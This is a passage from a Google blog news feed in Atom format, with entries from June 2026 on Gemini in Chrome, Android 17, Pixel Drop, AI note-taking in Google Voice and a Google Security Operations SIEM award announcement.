to:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Get answers and insights: &lt;/b&gt;Summarize articles, clarify complex concepts, or find specific information based on the context of open tabs.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Generate content:&lt;/b&gt; Draft emails and social media posts, or create images directly in the browser.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Go live: &lt;/b&gt;Engage in two-way voice conversations with Gemini Live to brainstorm ideas or prepare for meetings.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is ON by default unless you’ve already disabled the &lt;a href="https://support.google.com/a?p=gemini_in_chrome" target="_blank"&gt;Gemini app service setting&lt;/a&gt; or the &lt;a href="https://chromeenterprise.google/policies/#GeminiSettings" target="_blank"&gt;Chrome Gemini setting&lt;/a&gt;. The feature can be turned on or off at the domain, OU, or group level. Refer to the &lt;a href="https://support.google.com/a/answer/14571493" target="_blank"&gt;Help Center&lt;/a&gt; or our &lt;a href="http://workspaceupdates.googleblog.com/2025/09/gemini-in-google-chrome-admin-settings-available.html" target="_blank"&gt;previous announcement&lt;/a&gt; for information on the terms of service and privacy considerations for the feature.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;To access Gemini in Chrome, click the Gemini icon at the top of your browser. You must meet the criteria listed &lt;a href="https://support.google.com/a/answer/14571493" target="_blank"&gt;here&lt;/a&gt;. Learn more about using Gemini in Chrome &lt;a href="https://support.google.com/chrome/a/answer/17034491?visit_id=639124760733849519-596500748&amp;amp;p=gemini_in_chrome_learning_center&amp;amp;rd=2&amp;amp;ref_topic=17031489" target="_blank"&gt;here&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) started on June 10, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace plans, Workspace Individual subscribers, and users with personal Google accounts on ChromeOS, MacOS and Windows devices&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;Chrome Enterprise &amp;amp; Education Help: &lt;a href="https://support.google.com/chrome/a/answer/16291696" target="_blank"&gt;Gemini in Chrome&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Workspace Updates Blog: &lt;a href="https://workspaceupdates.googleblog.com/2025/10/use-gemini-in-chrome-ai-browsing-assistant.html" target="_blank"&gt;Use the Gemini in Chrome AI browsing assistant, now generally available&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/14571493" target="_blank"&gt;Turn the Gemini app on or off&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/14564320?hl=en&amp;amp;ref_topic=15995054&amp;amp;sjid=18281381205986296685-NA" target="_blank"&gt;Review Gemini usage in your organization&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Google Workspace Admin Help: &lt;a href="https://support.google.com/a/answer/15706919" target="_blank"&gt;Generative AI in Google Workspace Privacy Hub&lt;/a&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/expanded-availability-gemini-in-chrome.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T19:16:38+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/debiut-androida-17-na-smartfonach-pixel</id>
    <title>Debiut Androida 17 na smartfonach Pixel</title>
    <updated>2026-06-16T19:00:00+00:00</updated>
    <content type="html">Grafika przedstawia kolaż interfejsów smartfona na jasnym tle z subtelną liczbą 17. Widoczne są ekrany udostępniania lokalizacji, funkcji zagubionego urządzenia oraz komunikatora nałożonego na okno wideo.</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/debiut-androida-17-na-smartfonach-pixel" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-16T19:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/czerwcowy-pixel-drop-nowe-funkcje-dla-tworcow-ulepszenia-gemini-i-nie-tylko</id>
    <title>Czerwcowy Pixel Drop: nowe funkcje dla twórców, ulepszenia Gemini i nie tylko</title>
    <updated>2026-06-16T19:00:00+00:00</updated>
    <content type="html">Słowa „Pixel Drop”, w których czarny tekst jest pokryty trójwymiarowymi, błyszczącymi, jasnofioletowymi balonowymi literami układającymi się w napis „Pixel”</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/czerwcowy-pixel-drop-nowe-funkcje-dla-tworcow-ulepszenia-gemini-i-nie-tylko" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-16T19:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/czerwcowy-pixel-drop-nowe-funkcje-dla-tworcow-ulepszenia-gemini-i-nie-tylko/</id>
    <title>Czerwcowy Pixel Drop: nowe funkcje dla twórców, ulepszenia Gemini i nie tylko</title>
    <updated>2026-06-16T19:00:00+00:00</updated>
    <content type="html">Słowa „Pixel Drop”, w których czarny tekst jest pokryty trójwymiarowymi, błyszczącymi, jasnofioletowymi balonowymi literami układającymi się w napis „Pixel”</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/czerwcowy-pixel-drop-nowe-funkcje-dla-tworcow-ulepszenia-gemini-i-nie-tylko/" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-16T19:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/debiut-androida-17-na-smartfonach-pixel/</id>
    <title>Debiut Androida 17 na smartfonach Pixel</title>
    <updated>2026-06-16T19:00:00+00:00</updated>
    <content type="html">Grafika przedstawia kolaż interfejsów smartfona na jasnym tle z subtelną liczbą 17. Widoczne są ekrany udostępniania lokalizacji, funkcji zagubionego urządzenia oraz komunikatora nałożonego na okno wideo.</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/android-chrome-play/debiut-androida-17-na-smartfonach-pixel/" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-16T19:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/devices/pixel/june-2026-pixel-drop/</id>
    <title>June Pixel Drop: New features for creators, Gemini upgrades and more</title>
    <updated>2026-06-16T18:00:00+00:00</updated>
    <content type="html">The words "Pixel Drop," where the black text is overlaid with 3D, glossy light-purple balloon letters spelling out "Pixel."</content>
    <link href="https://blog.google/products-and-platforms/devices/pixel/june-2026-pixel-drop/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/families/summer-screen-time-family-fun/</id>
    <title>3 ways to balance screen time and keep kids engaged this summer</title>
    <updated>2026-06-16T18:00:00+00:00</updated>
    <content type="html">A graphic of a family doing an activity together. A YouTube and Gemini logo sit in the background.</content>
    <link href="https://blog.google/innovation-and-ai/technology/families/summer-screen-time-family-fun/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/android/android-17-features/</id>
    <title>Check out what's new in Android 17</title>
    <updated>2026-06-16T18:00:00+00:00</updated>
    <content type="html">Android 17 hero image</content>
    <link href="https://blog.google/products-and-platforms/platforms/android/android-17-features/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/android/new-expanded-android-parental-controls/</id>
    <title>New expanded Android parental controls to support families around the world</title>
    <updated>2026-06-16T18:00:00+00:00</updated>
    <content type="html">Video paused on a screen of a sitting, smiling woman surrounded by colorful, Google-themed items. Onscreen text says: Google Safety Updates, Android Parental Controls</content>
    <link href="https://blog.google/products-and-platforms/platforms/android/new-expanded-android-parental-controls/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/platforms/wear-os/google-io-2026-wear-os/</id>
    <title>Wear OS 7 helps your smartwatch keep up with you</title>
    <updated>2026-06-16T18:00:00+00:00</updated>
    <content type="html">Smartwatch faces on a teal background</content>
    <link href="https://blog.google/products-and-platforms/platforms/wear-os/google-io-2026-wear-os/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/google-org/digital-wellbeing-fund-mental-health/</id>
    <title>Expanding our U.S. digital wellbeing fund</title>
    <updated>2026-06-16T18:00:00+00:00</updated>
    <content type="html">A man writes on a large piece of paper</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/google-org/digital-wellbeing-fund-mental-health/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-16T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/AI-note-taking-in-google-voice.html</id>
    <title>AI note-taking is now available in Google Voice</title>
    <updated>2026-06-16T17:38:30+00:00</updated>
    <content type="html">“Take notes for me” is available in Google Voice for your phone calls. This powerful new feature records and transcribes calls, summarizes key points, and organizes action items, which are sent via Gmail and stored in the Voice app.  This built-in tool eliminates manual note-taking, ensures critical details are never lost, and drives a highly professional customer experience.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This feature is available for new Voice users by default and requires manual enablement for existing Voice users. Admins can easily turn it on in the admin console at the domain, OU, or group level. Once turned on, eligible users will see the “Record” button become a “Notes” button during calls.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;When you tap "Notes" during a Voice call, your conversation will be recorded and transcribed, while Gemini captures notes. When you hang up, you'll get an email with your notes in the body of the email. You can then find the transcript, audio recording, and notes saved right inside the Voice app alongside call details.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXWyRtsA6OxvmURn4gqgItmJpP-XR__ah6clw2ktGb3bEBis5OOi0-zSgSxvufq7jKDU8cERSoGwly_DM5R22qhL2d3j0m0bUGmcmaVpZp8k7-hpTne2PwgpYdbAhjvFIFxI9T_2XwN_hnAjUuOmwKZsIZgBw1u1mXNbv6ZOkqwABGZiZAo8hEu39Zx7U/s1200/Voice_Mobile_AI%20Generating%20Notes_Turning%20ON%20+%20Recording_NO%20RECORD.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="743" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXWyRtsA6OxvmURn4gqgItmJpP-XR__ah6clw2ktGb3bEBis5OOi0-zSgSxvufq7jKDU8cERSoGwly_DM5R22qhL2d3j0m0bUGmcmaVpZp8k7-hpTne2PwgpYdbAhjvFIFxI9T_2XwN_hnAjUuOmwKZsIZgBw1u1mXNbv6ZOkqwABGZiZAo8hEu39Zx7U/w343-h743/Voice_Mobile_AI%20Generating%20Notes_Turning%20ON%20+%20Recording_NO%20RECORD.gif" width="343" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg43X6uP_jujnfdYtrLx7WD5282spMQ5dxqhhKgudhmFGhkYbOQgcQ4TKpCN5ngkVsbC007Ih5PXmIPsbVod6u9W2UhWBwBvMgIMVswHPLeTX0EWCXFzNNzn1b_oW8fq-Rk9CD16OwEtm7Ft9R1uLYbw9AUbuLMpPTOOxpDEtk6T9cnpXNJCoPdGy10saJL/s1200/Voice_Mobile_Notes%20Button%20Activation_02_Notes%20Resolve%202.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="747" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg43X6uP_jujnfdYtrLx7WD5282spMQ5dxqhhKgudhmFGhkYbOQgcQ4TKpCN5ngkVsbC007Ih5PXmIPsbVod6u9W2UhWBwBvMgIMVswHPLeTX0EWCXFzNNzn1b_oW8fq-Rk9CD16OwEtm7Ft9R1uLYbw9AUbuLMpPTOOxpDEtk6T9cnpXNJCoPdGy10saJL/w345-h747/Voice_Mobile_Notes%20Button%20Activation_02_Notes%20Resolve%202.gif" width="345" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Privacy, ownership, and consent&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Post-call notes and transcriptions are strictly accessible only to the individual who initiated the AI capture. If multiple people start it, everyone gets their own separate artifact.&lt;/li&gt;&lt;li&gt;An audio disclosure ("This call is being recorded and captured by AI") ensures all participants are fully informed the moment the feature is activated. Admins are able to customize the consent in the admin console. Admins can also customize the consent language to align with their company's standards.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Note that this feature is only available in English at this time.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is OFF by default for existing Google Voice customers and can be enabled at the domain, OU, or group level. It is available by default for new Voice customers and can be turned off at any time. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/p/tnfm-voice" target="_blank"&gt;learn more about letting Google Voice take AI notes for your users&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;End users need to turn on Workspace Smart Feature Consent in the account settings to gain access. Visit the Help Center to &lt;a href="https://support.google.com/voice?p=voice_notes" target="_blank"&gt;learn more about Take notes for me in Google Voice&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid and Scheduled Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) starting on June 16, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Voice Standard and Voice Premier add-ons, as well as customers with Voice Standard standalone plans&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/p/tnfm-voice" target="_blank"&gt;Let Google Voice take AI notes for my users&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Voice Help: &lt;a href="https://support.google.com/voice?p=voice_notes" target="_blank"&gt;Take notes for me in Google Voice&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/AI-note-taking-in-google-voice.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T17:38:30+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/AI-note-taking-in-google-voice.html</id>
    <title>AI note-taking is now available in Google Voice</title>
    <updated>2026-06-16T17:38:30+00:00</updated>
    <content type="html">“Take notes for me” is available in Google Voice for your phone calls. This powerful new feature records and transcribes calls, summarizes key points, and organizes action items, which are sent via Gmail and stored in the Voice app.  This built-in tool eliminates manual note-taking, ensures critical details are never lost, and drives a highly professional customer experience.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This feature is available for new Voice users by default and requires manual enablement for existing Voice users. Admins can easily turn it on in the admin console at the domain, OU, or group level. Once turned on, eligible users will see the “Record” button become a “Notes” button during calls.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;When you tap "Notes" during a Voice call, your conversation will be recorded and transcribed, while Gemini captures notes. When you hang up, you'll get an email with your notes in the body of the email. You can then find the transcript, audio recording, and notes saved right inside the Voice app alongside call details.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXWyRtsA6OxvmURn4gqgItmJpP-XR__ah6clw2ktGb3bEBis5OOi0-zSgSxvufq7jKDU8cERSoGwly_DM5R22qhL2d3j0m0bUGmcmaVpZp8k7-hpTne2PwgpYdbAhjvFIFxI9T_2XwN_hnAjUuOmwKZsIZgBw1u1mXNbv6ZOkqwABGZiZAo8hEu39Zx7U/s1200/Voice_Mobile_AI%20Generating%20Notes_Turning%20ON%20+%20Recording_NO%20RECORD.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXXWyRtsA6OxvmURn4gqgItmJpP-XR__ah6clw2ktGb3bEBis5OOi0-zSgSxvufq7jKDU8cERSoGwly_DM5R22qhL2d3j0m0bUGmcmaVpZp8k7-hpTne2PwgpYdbAhjvFIFxI9T_2XwN_hnAjUuOmwKZsIZgBw1u1mXNbv6ZOkqwABGZiZAo8hEu39Zx7U/s16000/Voice_Mobile_AI%20Generating%20Notes_Turning%20ON%20+%20Recording_NO%20RECORD.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg43X6uP_jujnfdYtrLx7WD5282spMQ5dxqhhKgudhmFGhkYbOQgcQ4TKpCN5ngkVsbC007Ih5PXmIPsbVod6u9W2UhWBwBvMgIMVswHPLeTX0EWCXFzNNzn1b_oW8fq-Rk9CD16OwEtm7Ft9R1uLYbw9AUbuLMpPTOOxpDEtk6T9cnpXNJCoPdGy10saJL/s1200/Voice_Mobile_Notes%20Button%20Activation_02_Notes%20Resolve%202.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg43X6uP_jujnfdYtrLx7WD5282spMQ5dxqhhKgudhmFGhkYbOQgcQ4TKpCN5ngkVsbC007Ih5PXmIPsbVod6u9W2UhWBwBvMgIMVswHPLeTX0EWCXFzNNzn1b_oW8fq-Rk9CD16OwEtm7Ft9R1uLYbw9AUbuLMpPTOOxpDEtk6T9cnpXNJCoPdGy10saJL/s16000/Voice_Mobile_Notes%20Button%20Activation_02_Notes%20Resolve%202.gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Privacy, ownership, and consent&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Post-call notes and transcriptions are strictly accessible only to the individual who initiated the AI capture. If multiple people start it, everyone gets their own separate artifact.&lt;/li&gt;&lt;li&gt;An audio disclosure ("This call is being recorded and captured by AI") ensures all participants are fully informed the moment the feature is activated. Admins are able to customize the consent in the admin console. Admins can also customize the consent language to align with their company's standards.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Note that this feature is only available in English at this time.&lt;/i&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature is OFF by default for existing Google Voice customers and can be enabled at the domain, OU, or group level. It is available by default for new Voice customers and can be turned off at any time. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/p/tnfm-voice" target="_blank"&gt;learn more about letting Google Voice take AI notes for your users&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;End users need to turn on Workspace Smart Feature Consent in the account settings to gain access. Visit the Help Center to &lt;a href="https://support.google.com/voice?p=voice_notes" target="_blank"&gt;learn more about Take notes for me in Google Voice&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid and Scheduled Release domains&lt;/a&gt;: Extended rollout (potentially longer than 15 days for feature visibility) starting on June 16, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Available to all Google Workspace customers with Voice Standard and Voice Premier add-ons, as well as customers with Voice Standard standalone plans&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/p/tnfm-voice" target="_blank"&gt;Let Google Voice take AI notes for my users&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Voice Help: &lt;a href="https://support.google.com/voice?p=voice_notes" target="_blank"&gt;Take notes for me in Google Voice&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/AI-note-taking-in-google-voice.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-16T17:38:30+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/google-named-a-leader-in-idc-marketscape-siem-2026-vendor-assessment</id>
    <title>Google named a Leader in IDC MarketScape SIEM 2026 Vendor Assessment</title>
    <updated>2026-06-16T17:30:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security operations teams are under immense pressure to defend against adversaries who use AI to act with unprecedented speed, scale, and sophistication. To navigate these moments, secure mission-critical workloads, and build confident defense programs, organizations rely on modern security information and event management (SIEM) systems as the backbone of their security operations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are proud to announce that Google has been named a Leader in the 2026 IDC MarketScape for Worldwide SIEM Vendor Assessment (#US54126826, June 2026). We believe this recognition reflects our sustained investment and innovation in Google Security Operations, bringing together Mandiant's frontline expertise, comprehensive automation, and advanced AI agents to empower defenders.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;According to the report, Google was recognized for several key strengths, including:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Alert Triage and Investigation agent collects evidence, runs correlated searches, and produces a transparent verdict, reducing the security analyst workload. The additional agents announced at Google Cloud Next extend agentic workflows beyond triage into proactive hunting and rule generation. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google designs the silicon, runs the infrastructure, develops the Gemini foundation models through DeepMind, and encodes its internal security expertise into agent evaluation loops. Vertical AI integration supports unit economics that would be difficult to achieve through third-party model APIs and gives Google tighter control over the iteration cycle that improves agent accuracy on security-specific tasks. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Curated detection content authored by Mandiant analysts is mapped to MITRE ATT&amp;amp;CK and refreshed on a regular cadence. Customers report that the higher-tier curated rule sets deliver useful detections out of the box. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Search performance over large data volumes is a consistently cited technical strength. The unified data lake, combined with all-time UDM search and multistage search with cross joins, allows analysts to query the full retention period without the performance degradation common on legacy on-premises platforms.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image1_ZZjbofo.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;IDC MarketScape vendor analysis model is designed to provide an overview of the competitive fitness of technology and service suppliers in a given market.  The research methodology utilizes a rigorous scoring methodology based on both qualitative and quantitative criteria that results in a single graphical illustration of each vendor’s position within a given market. The Capabilities score measures vendor product, go-to-market and business execution in the short-term. The Strategy score measures alignment of vendor strategies with customer requirements in a 3-5-year timeframe. Vendor market share is represented by the size of the circles. Vendor year-over-year growth rate relative to the given market is indicated by a plus, neutral or minus next to the vendor name.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Security Operations, powered by AI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Speed and accuracy are crucial in threat detection and incident response. Google continues to drive security operations innovation to help defenders work smarter, not harder. By deeply embedding Gemini in Google Security Operations, we enable analysts to perform complex natural language searches across vast amounts of security telemetry. We have also added agents such as the Triage and Investigation agent that enhance analyst productivity by accelerating event summarization, dynamically generating detection rules, and building automated response playbooks in seconds instead of hours.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“With Google Security Operations, we’re able to take in large volumes of telemetry, introduce AI into our workflows, and we saw a 97% reduction in alerts,” Daniel Peterpaul, VP, Information Security, Sunrun.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Unparalleled access to threat intelligence&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A modern SIEM must go beyond data aggregation; it requires context. Google Threat Intelligence combines Mandiant's frontline expertise, the global reach of the VirusTotal community, and the unparalleled visibility of Google's services and devices into Google Security Operations.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our applied threat intelligence capability enables security teams to spend less time on manual monitoring and more time contextualizing alerts for better decision-making. Through services like &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/introducing-mandiant-hunt-for-chronicle"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Mandiant Hunt&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we integrate our proactive experts directly into Google Security Operations to help defenders search for undetected attacks and adversary tactics, techniques, and procedures (TTPs) before they escalate.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Ensuring operational resilience for global enterprises&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations around the globe are making significant leaps in both the technology they use and the way they think about security operations by partnering with Google. The ability to stitch together security telemetry and threat intelligence gives organizations visibility to full-service recovery and holistic security transformation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“Our engineers in the SOC are working on high fidelity, true positives only. So, you've got a high fidelity true positive that's fired, and frankly, you want that alarm then to be enriched with as much contextual information as possible, that's the shift that Gemini in SecOps will allow us to get to. We want AI to work in service of our people, and then we want people to use their human brilliance, creativity, big picture problem-solving to think about attack paths and predicting them, and really making our environment a hard target,” Matt Rowe, chief security officer, Lloyds Banking Group.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Take the next step in advancing your cyber defenses&lt;/strong&gt;&lt;/h3&gt;
